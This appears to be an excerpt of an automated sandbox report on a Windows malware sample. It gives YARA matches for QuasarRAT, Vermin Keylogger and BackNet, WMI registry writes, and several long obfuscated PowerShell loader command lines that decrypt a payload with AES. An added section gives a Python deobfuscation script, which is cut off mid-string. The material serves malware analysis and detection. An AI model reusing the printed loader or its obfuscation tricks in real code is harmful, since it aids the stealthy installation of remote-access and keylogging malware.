                      Source: Yara matchFile source: 8.2.powershell.exe.22557635510.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2800661538.000002255FA80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2741051863.00000225576FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2591788897.0000022548849000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2797885450.000002255F9C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5964, type: MEMORYSTR
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                      System Summary

Source: 8.2.powershell.exe.2255f9c0000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 8.2.powershell.exe.2255f9c0000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 8.2.powershell.exe.2255f9c0000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BackNet samples Author: Florian Roth
Source: 8.2.powershell.exe.22557635510.2.unpack, type: UNPACKEDPE | Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 8.2.powershell.exe.22557635510.2.unpack, type: UNPACKEDPE | Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 8.2.powershell.exe.22557635510.2.unpack, type: UNPACKEDPE | Matched rule: Detects BackNet samples Author: Florian Roth
Source: 8.2.powershell.exe.2255f9c0000.7.unpack, type: UNPACKEDPE | Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 8.2.powershell.exe.2255f9c0000.7.unpack, type: UNPACKEDPE | Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 8.2.powershell.exe.2255f9c0000.7.unpack, type: UNPACKEDPE | Matched rule: Detects BackNet samples Author: Florian Roth
Source: 8.2.powershell.exe.22557635510.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 8.2.powershell.exe.22557635510.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 8.2.powershell.exe.22557635510.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BackNet samples Author: Florian Roth
Source: 00000008.00000002.2797885450.000002255F9C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 00000008.00000002.2797885450.000002255F9C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 00000008.00000002.2797885450.000002255F9C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects BackNet samples Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 7252, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6104, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5964, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe | COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
Source: C:\Windows\System32\wscript.exe | COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::DeleteValue
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\wscript.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\wscript.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\wscript.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\wscript.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\wscript.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\wscript.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; } function tiw6l([byte[]]$ZUv5N) {Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore 'DTC$DTCqDTCKDTCaDTCGDTCiDTC=DTC[DTCBDTCiDTCtDTCCDTCoDTCnDTCvDTCeDTCrDTCtDTCeDTCrDTC]DTC:DTC:DTCTDTCoDTCIDTCnDTCtDTC3DTC2DTC(DTC$DTCZDTCUDTCvDTC5DTCNDTC,DTC0DTC)DTC;DTC'.Replace('DTC', ''); return $qKaGi; } $H2oUx = iT93g(0x74<#AgF8G#>,0x52<#sotVh#>,0x6B<#IJTfo#>,0x58<#aq0EZ#>,0x43<#lRyb0#>,0x36<#LDjCA#>,0x6A<#DRhTQ#>,0x2B<#Nxos5#>,0x34<#AjnVW#>,0x5A<#vkssP#>,0x6F<#Nr7dJ#>,0x52<#lsoI1#>,0x59<#pErVd#>,0x62<#tlAPZ#>,0x79<#kBIJZ#>,0x47<#HncF5#>,0x70<#hU1xu#>,0x6F<#TUEJh#>,0x4D<#cJg0H#>,0x45<#w2R2e#>,0x75<#QkdTi#>,0x6B<#LjyD9#>,0x6B<#EPiNN#>,0x43<#YN4lF#>,0x59<#bh0r2#>,0x46<#bfRBe#>,0x42<#OWjkm#>,0x51<#D0iPg#>,0x34<#pgAJc#>,0x2F<#OkTmn#>,0x46<#k7qw7#>,0x79<#ntwbA#>,0x64<#lRwjs#>,0x34<#lp8kK#>,0x58<#gppFR#>,0x4F<#zhqOk#>,0x4B<#xLpYw#>,0x4E<#Qpxm0#>,0x58<#QDHOx#>,0x78<#bubbt#>,0x2B<#gmscA#>,0x45<#CSle7#>,0x67<#LDi0E#>,0x3D<#bmXwZ#>); $qBAgs = iT93g(0x4E<#C2Vu0#>,0x47<#diaRv#>,0x30<#MGPf7#>,0x52<#QdMXt#>,0x63<#AESom#>,0x50<#NfQKQ#>,0x37<#uWoBq#>,0x49<#mQ8mb#>,0x36<#Z2Tts#>,0x7A<#GxC3u#>,0x75<#DZACY#>,0x45<#yjqHj#>,0x65<#DRQB2#>,0x65<#tbNzN#>,0x6F<#Cek6P#>,0x32<#Hvj6e#>,0x46<#YcXZM#>,0x6F<#YWlmr#>,0x77<#Ik0CX#>,0x72<#KlS1z#>,0x34<#jkNpr#>,0x51<#dzExQ#>,0x3D<#KAunG#>,0x3D<#f40yY#>); $ZXcf8 = iT93g(0x53<#b0lHD#>,0x6F<#YnhiC#>,0x66<#bdsGx#>,0x74<#tOssn#>,0x77<#hRyWf#>,0x61<#I0N5w#>,0x72<#PudcT#>,0x65<#r8GlO#>,0x5C<#wRgut#>,0x4D<#lRnzO#>,0x69<#SMHLu#>,0x63<#LCPm3#>,0x72<#galvu#>,0x6F<#oAPw7#>,0x73<#uIGer#>,0x6F<#SvDmv#>,0x66<#tMXra#>,0x74<#EnRsF#>,0x5C<#qtdsl#>,0x57<#aquA7#>,0x69<#lC02U#>,0x6E<#LGneX#>,0x64<#X9m0B#>,0x6F<#VC3Vo#>,0x77<#HtgrI#>,0x73<#IoY3L#>); $hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>); $B8Dta = tiw6l(0x00<#A7hB6#>,0x00<#O0RD9#>,0x00<#jXCyJ#>,0x00<#OM184#>); $iSxCm = tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>); $l8XQf = tiw6l(0x03<#CQs75#>,0x00<#GS7w6#>,0x00<#gTbLR#>,0x00<#o3nyw#>); $kzu3X = $null; function S2qwV($ti34n) {Invoke-Expression -Verbose -Debug -WarningAction Inquire 'Bqr$BqrEBqrLBqrpBqrtBqrFBqr=Bqr[BqrSBqryBqrsBqrtBqreBqrmBqr.BqrSBqreBqrcBqruBqrrBqriBqrtBqryBqr.BqrCBqrrBqryBqrpBqrtBqroBqrgBqrrBqraBqrpBqrhBqryBqr.BqrABqreBqrsBqr]Bqr:Bqr:BqrCBqrrBqreBqraBqrtBqreBqr(Bqr)Bqr;Bqr'.Replace('Bqr', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore 'l3m$l3mEl3mLl3mpl3mtl3mFl3m.l3mMl3mol3mdl3mel3m=l3m[l3mSl3myl3msl3mtl3mel3mml3m.l3mSl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mCl3mrl3myl3mpl3mtl3mol3mgl3
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; } function tiw6l([byte[]]$ZUv5N) {Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore 'DTC$DTCqDTCKDTCaDTCGDTCiDTC=DTC[DTCBDTCiDTCtDTCCDTCoDTCnDTCvDTCeDTCrDTCtDTCeDTCrDTC]DTC:DTC:DTCTDTCoDTCIDTCnDTCtDTC3DTC2DTC(DTC$DTCZDTCUDTCvDTC5DTCNDTC,DTC0DTC)DTC;DTC'.Replace('DTC', ''); return $qKaGi; } $H2oUx = iT93g(0x74<#AgF8G#>,0x52<#sotVh#>,0x6B<#IJTfo#>,0x58<#aq0EZ#>,0x43<#lRyb0#>,0x36<#LDjCA#>,0x6A<#DRhTQ#>,0x2B<#Nxos5#>,0x34<#AjnVW#>,0x5A<#vkssP#>,0x6F<#Nr7dJ#>,0x52<#lsoI1#>,0x59<#pErVd#>,0x62<#tlAPZ#>,0x79<#kBIJZ#>,0x47<#HncF5#>,0x70<#hU1xu#>,0x6F<#TUEJh#>,0x4D<#cJg0H#>,0x45<#w2R2e#>,0x75<#QkdTi#>,0x6B<#LjyD9#>,0x6B<#EPiNN#>,0x43<#YN4lF#>,0x59<#bh0r2#>,0x46<#bfRBe#>,0x42<#OWjkm#>,0x51<#D0iPg#>,0x34<#pgAJc#>,0x2F<#OkTmn#>,0x46<#k7qw7#>,0x79<#ntwbA#>,0x64<#lRwjs#>,0x34<#lp8kK#>,0x58<#gppFR#>,0x4F<#zhqOk#>,0x4B<#xLpYw#>,0x4E<#Qpxm0#>,0x58<#QDHOx#>,0x78<#bubbt#>,0x2B<#gmscA#>,0x45<#CSle7#>,0x67<#LDi0E#>,0x3D<#bmXwZ#>); $qBAgs = iT93g(0x4E<#C2Vu0#>,0x47<#diaRv#>,0x30<#MGPf7#>,0x52<#QdMXt#>,0x63<#AESom#>,0x50<#NfQKQ#>,0x37<#uWoBq#>,0x49<#mQ8mb#>,0x36<#Z2Tts#>,0x7A<#GxC3u#>,0x75<#DZACY#>,0x45<#yjqHj#>,0x65<#DRQB2#>,0x65<#tbNzN#>,0x6F<#Cek6P#>,0x32<#Hvj6e#>,0x46<#YcXZM#>,0x6F<#YWlmr#>,0x77<#Ik0CX#>,0x72<#KlS1z#>,0x34<#jkNpr#>,0x51<#dzExQ#>,0x3D<#KAunG#>,0x3D<#f40yY#>); $ZXcf8 = iT93g(0x53<#b0lHD#>,0x6F<#YnhiC#>,0x66<#bdsGx#>,0x74<#tOssn#>,0x77<#hRyWf#>,0x61<#I0N5w#>,0x72<#PudcT#>,0x65<#r8GlO#>,0x5C<#wRgut#>,0x4D<#lRnzO#>,0x69<#SMHLu#>,0x63<#LCPm3#>,0x72<#galvu#>,0x6F<#oAPw7#>,0x73<#uIGer#>,0x6F<#SvDmv#>,0x66<#tMXra#>,0x74<#EnRsF#>,0x5C<#qtdsl#>,0x57<#aquA7#>,0x69<#lC02U#>,0x6E<#LGneX#>,0x64<#X9m0B#>,0x6F<#VC3Vo#>,0x77<#HtgrI#>,0x73<#IoY3L#>); $hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>); $B8Dta = tiw6l(0x00<#A7hB6#>,0x00<#O0RD9#>,0x00<#jXCyJ#>,0x00<#OM184#>); $iSxCm = tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>); $l8XQf = tiw6l(0x03<#CQs75#>,0x00<#GS7w6#>,0x00<#gTbLR#>,0x00<#o3nyw#>); $kzu3X = $null; function S2qwV($ti34n) {Invoke-Expression -Verbose -Debug -WarningAction Inquire 'Bqr$BqrEBqrLBqrpBqrtBqrFBqr=Bqr[BqrSBqryBqrsBqrtBqreBqrmBqr.BqrSBqreBqrcBqruBqrrBqriBqrtBqryBqr.BqrCBqrrBqryBqrpBqrtBqroBqrgBqrrBqraBqrpBqrhBqryBqr.BqrABqreBqrsBqr]Bqr:Bqr:BqrCBqrrBqreBqraBqrtBqreBqr(Bqr)Bqr;Bqr'.Replace('Bqr', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore 'l3m$l3mEl3mLl3mpl3mtl3mFl3m.l3mMl3mol3mdl3mel3m=l3m[l3mSl3myl3msl3mtl3mel3mml3m.l3mSl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mCl3mrl3myl3mpl3mtl3mol3mgl3mr
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function Ib6pi([byte[]]$Sf4DZ) {Invoke-Expression -Verbose -WarningAction Inquire -Debug 'O2o$O2ocO2oqO2o1O2oaO2oGO2o=O2o[O2oSO2oyO2osO2otO2oeO2omO2o.O2oTO2oeO2oxO2otO2o.O2oEO2onO2ocO2ooO2odO2oiO2onO2ogO2o]O2o:O2o:O2oUO2oTO2oFO2o8O2o.O2oGO2oeO2otO2oSO2otO2orO2oiO2onO2ogO2o(O2o$O2oSO2ofO2o4O2oDO2oZO2o)O2o'.Replace('O2o', ''); return $cq1aG; } function Smsgn([byte[]]$TYS1W) {Invoke-Expression -Verbose -InformationAction Ignore 'StI$StIrStIwStIZStIwStIHStI=StI[StIBStIiStItStICStIoStInStIvStIeStIrStItStIeStIrStI]StI:StI:StITStIoStIIStInStItStI3StI2StI(StI$StITStIYStISStI1StIWStI,StI0StI)StI;StI'.Replace('StI', ''); return $rwZwH; } $yOU0b = Ib6pi(0x74<#chvvk#>,0x52<#u2CEY#>,0x6B<#MVTFN#>,0x58<#YiCr7#>,0x43<#K8mg9#>,0x36<#UhqQ4#>,0x6A<#cQm2O#>,0x2B<#flcxM#>,0x34<#OY2RT#>,0x5A<#ALzz6#>,0x6F<#zoKd3#>,0x52<#d4OvL#>,0x59<#SLwJ0#>,0x62<#zsa1m#>,0x79<#sFOep#>,0x47<#qGVN9#>,0x70<#Ks1U4#>,0x6F<#uGJ9p#>,0x4D<#kWql0#>,0x45<#EmsaU#>,0x75<#Ov8NF#>,0x6B<#uZpyF#>,0x6B<#XiBw9#>,0x43<#hUbO7#>,0x59<#ujaL4#>,0x46<#ZYnnj#>,0x42<#JY42r#>,0x51<#WtnPA#>,0x34<#YaV4N#>,0x2F<#HV4mN#>,0x46<#nKdcb#>,0x79<#lUwSl#>,0x64<#awCO3#>,0x34<#CnIFi#>,0x58<#uqMOd#>,0x4F<#YNg7w#>,0x4B<#HeBay#>,0x4E<#A4cb9#>,0x58<#F6Vnf#>,0x78<#kXGAK#>,0x2B<#ZMzDT#>,0x45<#E8P88#>,0x67<#Zyzgc#>,0x3D<#Auma2#>); $pKdS6 = Ib6pi(0x4E<#HLrGc#>,0x47<#xVisw#>,0x30<#EHfxR#>,0x52<#wp7Gt#>,0x63<#Cpdce#>,0x50<#OHyLe#>,0x37<#xvqHB#>,0x49<#PetlW#>,0x36<#lZgM3#>,0x7A<#TTBOg#>,0x75<#Rxgr0#>,0x45<#YsPlK#>,0x65<#qhXNz#>,0x65<#QaXw9#>,0x6F<#W6Vt9#>,0x32<#gIQiG#>,0x46<#yGjpJ#>,0x6F<#HP9Ri#>,0x77<#dPHbh#>,0x72<#KCTWk#>,0x34<#x6PPE#>,0x51<#VbwrN#>,0x3D<#RcqfM#>,0x3D<#l7sEq#>); $mxwaP = Ib6pi(0x53<#DbFNZ#>,0x6F<#Jy4Lx#>,0x66<#ez47J#>,0x74<#B1Uku#>,0x77<#kcRDO#>,0x61<#GimOz#>,0x72<#MUPpg#>,0x65<#a0Bz2#>,0x5C<#ehl3n#>,0x4D<#ZitVL#>,0x69<#smHT8#>,0x63<#fJC9S#>,0x72<#hMqWi#>,0x6F<#NkObo#>,0x73<#IzfrK#>,0x6F<#J1Yat#>,0x66<#dzRC7#>,0x74<#fM5r5#>,0x5C<#RyBgP#>,0x57<#T0PUW#>,0x69<#vTRqA#>,0x6E<#BHZJx#>,0x64<#mvlQt#>,0x6F<#p5nY6#>,0x77<#DohgT#>,0x73<#Sx8cw#>); $RGohu = Ib6pi(0x6B<#QlDDy#>,0x70<#NhkB5#>,0x44<#Zww3K#>,0x53<#eNvxb#>,0x46<#XM0XT#>); $RwltO = Smsgn(0x00<#h5SFV#>,0x00<#ucupc#>,0x00<#MID9v#>,0x00<#HXOXF#>); $ewoV8 = $true; $jOK5y = $null; function Yz1Gd($VHgBC) {Invoke-Expression -WarningAction Inquire -Debug -Verbose -InformationAction Ignore 'CKA$CKAeCKAyCKAyCKAQCKAHCKA=CKA[CKASCKAyCKAsCKAtCKAeCKAmCKA.CKASCKAeCKAcCKAuCKArCKAiCKAtCKAyCKA.CKACCKArCKAyCKApCKAtCKAoCKAgCKArCKAaCKApCKAhCKAyCKA.CKAACKAeCKAsCKA]CKA:CKA:CKACCKArCKAeCKAaCKAtCKAeCKA(CKA)CKA'.Replace('CKA', ''); Invoke-Expression -WarningAction Inquire -Verbose 'RHv$RHveRHvyRHvyRHvQRHvHRHv.RHvMRHvoRHvdRHveRHv=RHv[RHvSRHvyRHvsRHvtRHveRHvmRHv.RHvSRHveRHvcRHvuRHvrRHviRHvtRHvyRHv.RHvCRHvrRHvyRHvpRHvtRHvoRHvgRHvrRHvaRHvpRHvhRHvyRHv.RHvCRHviRHvpRHvhRHveRHvrRHvMRHvoRHvdRHveRHv]RHv:RHv:RHvCRHvBRHvCRHv'.Replace('RHv', ''); Invoke-Expression -Verbose -D
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function IrUjV([byte[]]$f9mpX) {Invoke-Expression -Verbose -Debug -InformationAction Ignore 'zZO$zZOSzZOfzZOYzZOszZO9zZO=zZO[zZOSzZOyzZOszZOtzZOezZOmzZO.zZOTzZOezZOxzZOtzZO.zZOEzZOnzZOczZOozZOdzZOizZOnzZOgzZO]zZO:zZO:zZOUzZOTzZOFzZO8zZO.zZOGzZOezZOtzZOSzZOtzZOrzZOizZOnzZOgzZO(zZO$zZOfzZO9zZOmzZOpzZOXzZO)zZO'.Replace('zZO', ''); return $SfYs9; } function SsYTA([byte[]]$MyDKV) {Invoke-Expression -WarningAction Inquire -Verbose 'RzW$RzWGRzWwRzW1RzWMRzWHRzW=RzW[RzWBRzWiRzWtRzWCRzWoRzWnRzWvRzWeRzWrRzWtRzWeRzWrRzW]RzW:RzW:RzWTRzWoRzWIRzWnRzWtRzW3RzW2RzW(RzW$RzWMRzWyRzWDRzWKRzWVRzW,RzW0RzW)RzW;RzW'.Replace('RzW', ''); return $Gw1MH; } $MXyPq = IrUjV(0x74, 0x52, 107, 88, 67, 54, 106, 0x2b, 0x34, 90, 0x6f, 82, 0x59, 0x62, 0x79, 0x47, 0x70, 111, 77, 69, 117, 0x6b, 0x6b, 0x43, 89, 0x46, 0x42, 81, 0x34, 47, 70, 121, 0x64, 0x34, 0x58, 79, 0x4b, 0x4e, 0x58, 120, 0x2b, 69, 103, 61); $lsxMg = IrUjV(0x4e, 0x47, 48, 82, 99, 80, 55, 0x49, 0x36, 122, 0x75, 69, 0x65, 0x65, 0x6f, 0x32, 0x46, 111, 119, 114, 52, 0x51, 0x3d, 0x3d); $gYqop = IrUjV(0x53, 0x6f, 102, 116, 119, 97, 114, 0x65, 0x5c, 77, 0x69, 99, 0x72, 0x6f, 0x73, 0x6f, 0x66, 116, 92, 87, 105, 0x6e, 0x64, 0x6f, 119, 0x73); $QR3m4 = IrUjV(0x4a, 0x6d, 106, 53, 121); $Q21ag = IrUjV(0x67, 0x69, 69, 99, 67); $u2Okr = SsYTA(0x00, 0, 0, 0x00); $dXs3R = $true; $gnS0E = $null; function juypb($gsleS) {Invoke-Expression -Debug -WarningAction Inquire 'Fs5$Fs5wFs5GFs52Fs5gFs5lFs5=Fs5[Fs5SFs5yFs5sFs5tFs5eFs5mFs5.Fs5SFs5eFs5cFs5uFs5rFs5iFs5tFs5yFs5.Fs5CFs5rFs5yFs5pFs5tFs5oFs5gFs5rFs5aFs5pFs5hFs5yFs5.Fs5AFs5eFs5sFs5]Fs5:Fs5:Fs5CFs5rFs5eFs5aFs5tFs5eFs5(Fs5)Fs5'.Replace('Fs5', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug -Verbose 'hta$htawhtaGhta2htaghtalhta.htaMhtaohtadhtaehta=hta[htaShtayhtashtathtaehtamhta.htaShtaehtachtauhtarhtaihtathtayhta.htaChtarhtayhtaphtathtaohtaghtarhtaahtaphtahhtayhta.htaChtaihtaphtahhtaehtarhtaMhtaohtadhtaehta]hta:hta:htaChtaBhtaChta'.Replace('hta', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire 'RLY$RLYwRLYGRLY2RLYgRLYlRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLY=RLY[RLYSRLYyRLYsRLYtRLYeRLYmRLY.RLYSRLYeRLYcRLYuRLYrRLYiRLYtRLYyRLY.RLYCRLYrRLYyRLYpRLYtRLYoRLYgRLYrRLYaRLYpRLYhRLYyRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLYMRLYoRLYdRLYeRLY]RLY:RLY:RLYPRLYKRLYCRLYSRLY7RLY'.Replace('RLY', ''); Invoke-Expression -WarningAction Inquire -Verbose 'MnG$MnGwMnGGMnG2MnGgMnGlMnG.MnGKMnGeMnGyMnG=MnG[MnGSMnGyMnGsMnGtMnGeMnGmMnG.MnGCMnGoMnGnMnGvMnGeMnGrMnGtMnG]MnG:MnG:MnGFMnGrMnGoMnGmMnGBMnGaMnGsMnGeMnG6MnG4MnGSMnGtMnGrMnGiMnGnMnGgMnG(MnG$MnGMMnGXMnGyMnGPMnGqMnG)MnG'.Replace('MnG', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire 'BNK$BNKwBNKGBNK2BNKgBNKlBNK.BNKIBNKVBNK=BNK[BNKSBNKyBNKsBNKtBNKeBNKmBNK.BNKCBNKoBNKnBNKvBNKeBNKrBNKtBNK]BNK:BNK:BNKFBNKrBNKoBNKmBNKBBNKaBNKsBNKeBNK6BNK4BNKSBNKtBNKrBNKiBNKnBNKgBNK(BNK$BNKl
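The four command lines above rely on two string-hiding tricks: every statement is a junk-token string (for instance 'H6M$H6MwH6Mh...'.Replace('H6M', '')) handed to Invoke-Expression, and every literal is a byte array (hex or decimal, padded with <# junk #> block comments) passed to a helper that runs UTF8.GetString or BitConverter.ToInt32. Both are reversible without executing anything. The Python script below is an added worked example, not code from the Joe Sandbox report or from the sample. It runs on a constructed excerpt copied from the first and third command lines (the helper definitions, several byte-array assignments and the AES setup statements) and recovers the two base64 strings (32 and 16 bytes decoded, the AES-256 key and IV sizes), the Software\Microsoft\Windows registry path that the loader reads (presumably where the StdRegProv writes listed above land; the report itself does not show the key name), the short value names, and the cleaned CBC/PKCS7 setup. The labels produced by describe() are size-based triage heuristics, not facts stated in the report.

```python
"""Statically recover the strings hidden in the PowerShell loader recorded in this report.

Added example, not code from the report or the sample. Two obfuscation layers are undone:
  1. Junk-token strings fed to Invoke-Expression, e.g. 'H6M$H6MwH6Mh...'.Replace('H6M', '').
  2. Literals passed as byte arrays (hex or decimal, with <# junk #> comments) to a helper
     function that calls [Text.Encoding]::UTF8.GetString or [BitConverter]::ToInt32.
"""
import base64
import binascii
import re

# Constructed excerpt: helper definitions and assignments copied from the first and third
# command lines in the report; the real command lines are roughly 5000 characters each.
SAMPLE = (
    r"& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; } "
    r"function tiw6l([byte[]]$ZUv5N) {Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore 'DTC$DTCqDTCKDTCaDTCGDTCiDTC=DTC[DTCBDTCiDTCtDTCCDTCoDTCnDTCvDTCeDTCrDTCtDTCeDTCrDTC]DTC:DTC:DTCTDTCoDTCIDTCnDTCtDTC3DTC2DTC(DTC$DTCZDTCUDTCvDTC5DTCNDTC,DTC0DTC)DTC;DTC'.Replace('DTC', ''); return $qKaGi; } "
    r"function IrUjV([byte[]]$f9mpX) {Invoke-Expression -Verbose -Debug -InformationAction Ignore 'zZO$zZOSzZOfzZOYzZOszZO9zZO=zZO[zZOSzZOyzZOszZOtzZOezZOmzZO.zZOTzZOezZOxzZOtzZO.zZOEzZOnzZOczZOozZOdzZOizZOnzZOgzZO]zZO:zZO:zZOUzZOTzZOFzZO8zZO.zZOGzZOezZOtzZOSzZOtzZOrzZOizZOnzZOgzZO(zZO$zZOfzZO9zZOmzZOpzZOXzZO)zZO'.Replace('zZO', ''); return $SfYs9; } "
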